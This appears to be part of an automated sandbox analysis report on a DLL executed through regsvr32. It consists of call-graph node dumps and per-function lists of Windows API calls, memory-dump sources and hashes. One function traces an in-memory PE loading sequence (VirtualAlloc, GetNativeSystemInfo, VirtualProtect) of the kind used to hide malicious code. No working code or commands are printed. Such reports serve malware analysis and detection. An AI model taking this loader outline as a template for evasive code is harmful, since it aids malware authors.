17567->17573 17571 1003081a 17569->17571 17571->17573 17575 10034524 __decode_pointer 6 API calls 17571->17575 17572 100308e4 17572->17313 17581 100308e7 17573->17581 17580 1003082f 17575->17580 17576 100308db 17577 100306e0 __mtinitlocknum 3 API calls 17576->17577 17577->17572 17578 1003451b 6 API calls _raise 17578->17580 17579 10034524 6 API calls __decode_pointer 17579->17580 17580->17573 17580->17578 17580->17579 17582 100308c8 17581->17582 17583 100308ed 17581->17583 17582->17572 17585 1003578b LeaveCriticalSection 17582->17585 17586 1003578b LeaveCriticalSection 17583->17586 17585->17576 17586->17582 17594 1003b87e _memset 17587->17594 17588 1003b927 RtlAllocateHeap 17588->17594 17589 1003654f _realloc 6 API calls 17589->17594 17590 10035865 __lock 44 API calls 17590->17594 17591 1003b896 17591->17321 17592 10036077 ___sbh_alloc_block 5 API calls 17592->17594 17594->17588 17594->17589 17594->17590 17594->17591 17594->17592 17595 1003b96e 17594->17595 17598 1003578b LeaveCriticalSection 17595->17598 17597 1003b975 17597->17594 17598->17597 17617 1003578b LeaveCriticalSection 17599->17617 17601 100346a7 17601->17337 17603 10033661 InterlockedIncrement 17602->17603 17604 10033664 17602->17604 17603->17604 17605 10033671 17604->17605 17606 1003366e InterlockedIncrement 17604->17606 17607 1003367b InterlockedIncrement 17605->17607 17608 1003367e 17605->17608 17606->17605 17607->17608 17609 10033688 InterlockedIncrement 17608->17609 17611 1003368b 17608->17611 17609->17611 17610 100336a4 InterlockedIncrement 17610->17611 17611->17610 17612 100336b4 InterlockedIncrement 17611->17612 17613 100336bf InterlockedIncrement 17611->17613 17612->17611 17613->17340 17618 1003578b LeaveCriticalSection 17614->17618 17616 100346f5 17616->17342 17617->17601 17618->17616 17620 10034796 17619->17620 17621 10034898 17620->17621 17622 1002e577 __mtinitlocknum 44 API calls 17620->17622 17626 100347ae 17620->17626 17621->17344 17622->17626 17623 1002e577 __mtinitlocknum 44 API calls 17624 100347bc 17623->17624 17625 100347ca 17624->17625 17627 1002e577 __mtinitlocknum 44 API calls 17624->17627 17628 100347d8 17625->17628 17629 1002e577 __mtinitlocknum 44 API calls 17625->17629 17626->17623 17626->17624 17627->17625 17630 100347e6 17628->17630 17632 1002e577 __mtinitlocknum 44 API calls 17628->17632 17629->17628 17631 100347f4 17630->17631 17633 1002e577 __mtinitlocknum 44 API calls 17630->17633 17634 10034802 17631->17634 17635 1002e577 __mtinitlocknum 44 API calls 17631->17635 17632->17630 17633->17631 17636 10034813 17634->17636 17637 1002e577 __mtinitlocknum 44 API calls 17634->17637 17635->17634 17638 10035865 __lock 44 API calls 17636->17638 17637->17636 17639 1003481b 17638->17639 17640 10034840 17639->17640 17641 10034827 InterlockedDecrement 17639->17641 17655 100348a4 17640->17655 17641->17640 17642 10034832 17641->17642 17642->17640 17645 1002e577 __mtinitlocknum 44 API calls 17642->17645 17645->17640 17646 10035865 __lock 44 API calls 17647 10034854 17646->17647 17648 10034885 17647->17648 17658 100336d2 17647->17658 17701 100348b0 17648->17701 17652 1002e577 __mtinitlocknum 44 API calls 17652->17621 17704 1003578b LeaveCriticalSection 17655->17704 17657 1003484d 17657->17646 17659 100336e3 InterlockedDecrement 17658->17659 17660 10033766 17658->17660 17661 100336fb 17659->17661 17662 100336f8 InterlockedDecrement 17659->17662 17660->17648 17672 100334fa 17660->17672 17663 10033705 InterlockedDecrement 17661->17663 17664 10033708 17661->17664 17662->17661 17663->17664 17665 10033712 InterlockedDecrement 17664->17665 17666 10033715 17664->17666 17665->17666 17667 1003371f InterlockedDecrement 17666->17667 17669 10033722 17666->17669 17667->17669 17668 1003373b InterlockedDecrement 17668->17669 17669->17668 17670 1003374b InterlockedDecrement 17669->17670 17671 10033756 InterlockedDecrement 17669->17671 17670->17669 17671->17660 17673 1003357e 17672->17673 17675 10033511 17672->17675 17674 100335cb 17673->17674 17676 1002e577 __mtinitlocknum 44 API calls 17673->17676 17686 100335f2 17674->17686 17721 1003cbed 17674->17721 17675->17673 17685 1002e577 __mtinitlocknum 44 API calls 17675->17685 17688 10033545 17675->17688 17678 1003359f 17676->17678 17680 1002e577 __mtinitlocknum 44 API calls 17678->17680 17687 100335b2 17680->17687 17681 10033568 17682 1002e577 __mtinitlocknum 44 API calls 17681->17682 17689 10033573 17682->17689 17683 10033637 17690 1002e577 __mtinitlocknum 44 API calls 17683->17690 17684 1002e577 __mtinitlocknum 44 API calls 17684->17686 17691 1003353a 17685->17691 17686->17683 17692 1002e577 44 API calls __mtinitlocknum 17686->17692 17693 1002e577 __mtinitlocknum 44 API calls 17687->17693 17688->17681 17694 1002e577 __mtinitlocknum 44 API calls 17688->17694 17696 1002e577 __mtinitlocknum 44 API calls 17689->17696 17697 1003363d 17690->17697 17705 1003d00a 17691->17705 17692->17686 17699 100335c0 17693->17699 17695 1003355b ___free_lconv_num 17694->17695 17695->17681 17696->17673 17697->17648 17700 1002e577 __mtinitlocknum 44 API calls 17699->17700 17700->17674 17809 1003578b LeaveCriticalSection 17701->17809 17703 10034892 17703->17652 17704->17657 17706 1003d017 17705->17706 17720 1003d094 17705->17720 17707 1003d028 17706->17707 17708 1002e577 __mtinitlocknum 44 API calls 17706->17708 17709 1003d03a 17707->17709 17710 1002e577 __mtinitlocknum 44 API calls 17707->17710 17708->17707 17711 1002e577 __mtinitlocknum 44 API calls 17709->17711 17712 1003d04c 17709->17712 17710->17709 17711->17712 17713 1003d05e 17712->17713 17714 1002e577 __mtinitlocknum 44 API calls 17712->17714 17715 1003d070 17713->17715 17716 1002e577 __mtinitlocknum 44 API calls 17713->17716 17714->17713 17717 1003d082 17715->17717 17718 1002e577 __mtinitlocknum 44 API calls 17715->17718 17716->17715 17719 1002e577 __mtinitlocknum 44 API calls 17717->17719 17717->17720 17718->17717 17719->17720 17720->17688 17722 100335eb 17721->17722 17723 1003cbfe 17721->17723 17722->17684 17724 1002e577 __mtinitlocknum 44 API calls 17723->17724 17725 1003cc06 17724->17725 17726 1002e577 __mtinitlocknum 44 API calls 17725->17726 17727 1003cc0e 17726->17727 17728 1002e577 __mtinitlocknum 44 API calls 17727->17728 17729 1003cc16 17728->17729 17730 1002e577 __mtinitlocknum 44 API calls 17729->17730 17731 1003cc1e 17730->17731 17732 1002e577 __mtinitlocknum 44 API calls 17731->17732 17733 1003cc26 17732->17733 17734 1002e577 __mtinitlocknum 44 API calls 17733->17734 17735 1003cc2e 17734->17735 17736 1002e577 __mtinitlocknum 44 API calls 17735->17736 17737 1003cc35 17736->17737 17738 1002e577 __mtinitlocknum 44 API calls 17737->17738 17739 1003cc3d 17738->17739 17740 1002e577 __mtinitlocknum 44 API calls 17739->17740 17741 1003cc45 17740->17741 17742 1002e577 __mtinitlocknum 44 API calls 17741->17742 17743 1003cc4d 17742->17743 17744 1002e577 __mtinitlocknum 44 API calls 17743->17744 17745 1003cc55 17744->17745 17746 1002e577 __mtinitlocknum 44 API calls 17745->17746 17747 1003cc5d 17746->17747 17748 1002e577 __mtinitlocknum 44 API calls 17747->17748 17749 1003cc65 17748->17749 17750 1002e577 __mtinitlocknum 44 API calls 17749->17750 17751 1003cc6d 17750->17751 17752 1002e577 __mtinitlocknum 44 API calls 17751->17752 17753 1003cc75 17752->17753 17754 1002e577 __mtinitlocknum 44 API calls 17753->17754 17755 1003cc7d 17754->17755 17756 1002e577 __mtinitlocknum 44 API calls 17755->17756 17757 1003cc88 17756->17757 17758 1002e577 __mtinitlocknum 44 API calls 17757->17758 17759 1003cc90 17758->17759 17760 1002e577 __mtinitlocknum 44 API calls 17759->17760 17761 1003cc98 17760->17761 17762 1002e577 __mtinitlocknum 44 API calls 17761->17762 17763 1003cca0 17762->17763 17764 1002e577 __mtinitlocknum 44 API calls 17763->17764 17765 1003cca8 17764->17765 17766 1002e577 __mtinitlocknum 44 API calls 17765->17766 17767 1003ccb0 17766->17767 17768 1002e577 __mtinitlocknum 44 API calls 17767->17768 17769 1003ccb8 17768->17769 17770 1002e577 __mtinitlocknum 44 API calls 17769->17770 17771 1003ccc0 17770->17771 17772 1002e577 __mtinitlocknum 44 API calls 17771->17772 17773 1003ccc8 17772->17773 17774 1002e577 __mtinitlocknum 44 API calls 17773->17774 17775 1003ccd0 17774->17775 17776 1002e577 __mtinitlocknum 44 API calls 17775->17776 17777 1003ccd8 17776->17777 17778 1002e577 __mtinitlocknum 44 API calls 17777->17778 17779 1003cce0 17778->17779 17780 1002e577 __mtinitlocknum 44 API calls 17779->17780 17781 1003cce8 17780->17781 17782 1002e577 __mtinitlocknum 44 API calls 17781->17782 17783 1003ccf0 17782->17783 17784 1002e577 __mtinitlocknum 44 API calls 17783->17784 17785 1003ccf8 17784->17785 17786 1002e577 __mtinitlocknum 44 API calls 17785->17786 17787 1003cd00 17786->17787 17788 1002e577 __mtinitlocknum 44 API calls 17787->17788 17789 1003cd0e 17788->17789 17790 1002e577 __mtinitlocknum 44 API calls 17789->17790 17791 1003cd19 17790->17791 17792 1002e577 __mtinitlocknum 44 API calls 17791->17792 17793 1003cd24 17792->17793 17794 1002e577 __mtinitlocknum 44 API calls 17793->17794 17795 1003cd2f 17794->17795 17796 1002e577 __mtinitlocknum 44 API calls 17795->17796 17797 1003cd3a 17796->17797 17798 1002e577 __mtinitlocknum 44 API calls 17797->17798 17799 1003cd45 17798->17799 17800 1002e577 __mtinitlocknum 44 API calls 17799->17800 17801 1003cd50 17800->17801 17802 1002e577 __mtinitlocknum 44 API calls 17801->17802 17803 1003cd5b 17802->17803 17804 1002e577 __mtinitlocknum 44 API calls 17803->17804 17805 1003cd66 17804->17805 17806 1002e577 __mtinitlocknum 44 API calls 17805->17806 17807 1003cd71 17806->17807 17808 1002e577 __mtinitlocknum 44 API calls 17807->17808 17808->17722 17809->17703 17811 1002e654 _malloc 44 API calls 17810->17811 17812 10008010 17811->17812 17813 1002e577 __mtinitlocknum 44 API calls 17812->17813 17814 1000801c 17812->17814 17813->17814

                                                                                                          Executed Functions

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 7 10002d40-10002d67 call 100024a0 10 10002d70-10002d81 7->10 11 10002d69-10002d6b 7->11 13 10002d83-10002d90 SetLastError 10->13 14 10002d95-10002db0 call 100024a0 10->14 12 1000315a-1000315d 11->12 13->12 17 10002db2-10002db4 14->17 18 10002db9-10002dce 14->18 17->12 19 10002dd0-10002ddd SetLastError 18->19 20 10002de2-10002def 18->20 19->12 21 10002df1-10002dfe SetLastError 20->21 22 10002e03-10002e0c 20->22 21->12 23 10002e20-10002e41 22->23 24 10002e0e-10002e1b SetLastError 22->24 25 10002e55-10002e5f 23->25 24->12 26 10002e61-10002e68 25->26 27 10002e97-10002ed2 GetNativeSystemInfo 25->27 28 10002e78-10002e84 26->28 29 10002e6a-10002e76 26->29 30 10002ed4-10002ee1 SetLastError 27->30 31 10002ee6-10002f05 VirtualAlloc 27->31 32 10002e87-10002e8d 28->32 29->32 30->12 33 10002f32-10002f4a GetProcessHeap HeapAlloc 31->33 34 10002f07-10002f21 VirtualAlloc 31->34 35 10002e95 32->35 36 10002e8f-10002e92 32->36 38 10002f6c-10002fd0 call 100024a0 33->38 39 10002f4c-10002f67 VirtualFree SetLastError 33->39 34->33 37 10002f23-10002f2d SetLastError 34->37 35->25 36->35 37->12 43 10002fd2 38->43 44 10002fdc-10003041 VirtualAlloc call 10002320 call 100024d0 38->44 39->12 45 1000314c-10003158 call 10003310 43->45 52 10003043 44->52 53 1000304d-1000305e 44->53 45->12 52->45 54 10003060-10003076 call 100029c0 53->54 55 10003078-1000307b 53->55 57 10003082-10003090 call 10002ab0 54->57 55->57 61 10003092 57->61 62 1000309c-100030aa call 100027c0 57->62 61->45 65 100030b6-100030c4 call 10002940 62->65 66 100030ac 62->66 69 100030c6 65->69 70 100030cd-100030d6 65->70 66->45 69->45 71 100030d8-100030df 70->71 72 1000313d-10003140 70->72 74 100030e1-10003102 71->74 75 1000312a-10003138 71->75 73 10003147-1000314a 72->73 73->12 73->45 77 10003106-1000310d 74->77 76 1000313b 75->76 76->73 78 1000311e-10003128 77->78 79 1000310f-1000311a SetLastError 77->79 78->76 79->45
                                                                                                          APIs
                                                                                                            • Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1
                                                                                                          • SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
                                                                                                          • Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
                                                                                                          • GlobalHandle.KERNEL32(027A48A8), ref: 1002AE1E
                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
                                                                                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 1002AE41
                                                                                                          • GlobalHandle.KERNEL32(027A48A8), ref: 1002AE53
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE5A
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE6F
                                                                                                          • _memset.LIBCMT ref: 1002AE89
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 496899490-0
                                                                                                          • Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
                                                                                                          • Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __lock.LIBCMT ref: 1002E595
                                                                                                            • Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
                                                                                                            • Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
                                                                                                            • Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F
                                                                                                          • ___sbh_find_block.LIBCMT ref: 1002E5A0
                                                                                                          • ___sbh_free_block.LIBCMT ref: 1002E5AF
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
                                                                                                          • GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                          • String ID:
                                                                                                          • API String ID: 2714421763-0
                                                                                                          • Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
                                                                                                          • Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 131 100036a0-100036bb call 1002e654 133 100036c0-100036e5 131->133 135 10003896-100038b1 133->135 136 100036eb-10003891 133->136 138 100038b7-10004a34 135->138 139 10004a39-10004a3d 135->139
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 100036BB
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 501242067-2694261586
                                                                                                          • Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
                                                                                                          • Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 140 10003440-1000344d 141 10003454-10003462 140->141 142 1000344f call 100033f0 140->142 144 10003464-10003466 141->144 145 1000346b-10003486 141->145 142->141 146 10003699-1000369c 144->146 147 10003495-100034a2 145->147 148 10003488-10003493 145->148 149 100034b1-100034b7 call 1002e654 147->149 150 100034a4-100034af 147->150 148->147 152 100034bc-100034c6 149->152 150->149 153 100034c8-100034ca 152->153 154 100034cf-100034d6 152->154 153->146 155 100034dd-100034e3 154->155 156 10003696 155->156 157 100034e9-100034f5 155->157 156->146 158 100034f7-10003509 157->158 159 1000350b-10003527 157->159 160 1000352a-1000353c 158->160 159->160 161 10003552-1000356d 160->161 162 1000353e-10003550 160->162 163 10003570-10003582 161->163 162->163 164 10003584-10003596 163->164 165 10003598-100035b4 163->165 166 100035b7-100035c9 164->166 165->166 167 100035cb-100035dd 166->167 168 100035df-100035fb 166->168 169 100035fe-10003628 167->169 168->169 170 10003647-1000364f 169->170 171 1000362a-10003644 169->171 172 10003651-1000366b 170->172 173 1000366e-10003676 170->173 171->170 172->173 174 10003691 173->174 175 10003678-1000368e 173->175 174->155 175->174
                                                                                                          APIs
                                                                                                            • Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9
                                                                                                          • _malloc.LIBCMT ref: 100034B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 1579825452-2694261586
                                                                                                          • Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
                                                                                                          • Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 176 10002690-100026a0 177 100026a2-100026a7 176->177 178 100026ac-100026b8 176->178 179 100027ac-100027af 177->179 180 10002714-10002776 178->180 181 100026ba-100026c5 178->181 184 10002784-100027a1 VirtualProtect 180->184 185 10002778-10002781 180->185 182 100026c7-100026ce 181->182 183 1000270a-1000270f 181->183 186 100026d0-100026de 182->186 187 100026f2-10002704 VirtualFree 182->187 183->179 188 100027a3-100027a5 184->188 189 100027a7 184->189 185->184 186->187 190 100026e0-100026f0 186->190 187->183 188->179 189->179 190->183 190->187
                                                                                                          APIs
                                                                                                          • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 1263568516-0
                                                                                                          • Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
                                                                                                          • Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 191 100024d0-100024fe 192 10002512-1000251e 191->192 193 10002524-1000252b 192->193 194 10002616 192->194 195 10002593-100025ae call 100024a0 193->195 196 1000252d-1000253a 193->196 197 1000261b-1000261e 194->197 205 100025b0-100025b2 195->205 206 100025b4-100025d9 VirtualAlloc 195->206 199 1000253c-1000255e VirtualAlloc 196->199 200 1000258e 196->200 203 10002560-10002562 199->203 204 10002567-1000258b call 100022d0 199->204 200->192 203->197 204->200 205->197 209 100025db-100025dd 206->209 210 100025df-1000260e call 10002320 206->210 209->197 210->194
                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
                                                                                                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
